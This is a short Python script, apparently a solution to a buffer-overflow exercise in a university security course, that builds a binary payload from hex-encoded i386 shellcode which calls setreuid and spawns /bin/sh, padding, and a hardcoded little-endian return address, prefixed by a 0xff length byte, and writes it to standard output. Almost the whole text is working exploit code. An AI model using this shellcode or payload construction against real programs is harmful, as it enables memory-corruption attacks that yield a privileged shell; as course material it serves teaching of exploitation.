egg2

#!/usr/bin/python3

def fuck8(txt):
    assert(len(txt) == 8)
    return txt[6:8] + txt[4:6] + txt[2:4] + txt[0:2]

def revert(txt):
    assert(len(txt) % 8 == 0)
    res = ""
    for i in range(int(len(txt) / 8)):
        res += fuck8(txt[i*8:(i+1)*8])
    return res

# cs161-atw
raddr = "bffffa18"
#shellcode = "\x6a\x31\x58\xcd\x80\x89\xc3\x89\xc1\x6a\x46\x58\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x54\x5b\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"
shellcode = "6a3158cd8089c389c16a4658cd8031c050682f2f7368682f62696e545b505389e131d2b00bcd800a"

length_to_fill = 20 + 128 - int(len(shellcode)/2)
fill = "01" * length_to_fill

int8_neg1 = "ff"

payload = int8_neg1 + (shellcode) + fill + revert(raddr)
#print(payload)

import binascii

b = binascii.unhexlify(payload)
with open('/dev/fd/1','wb') as f:
    f.write(b)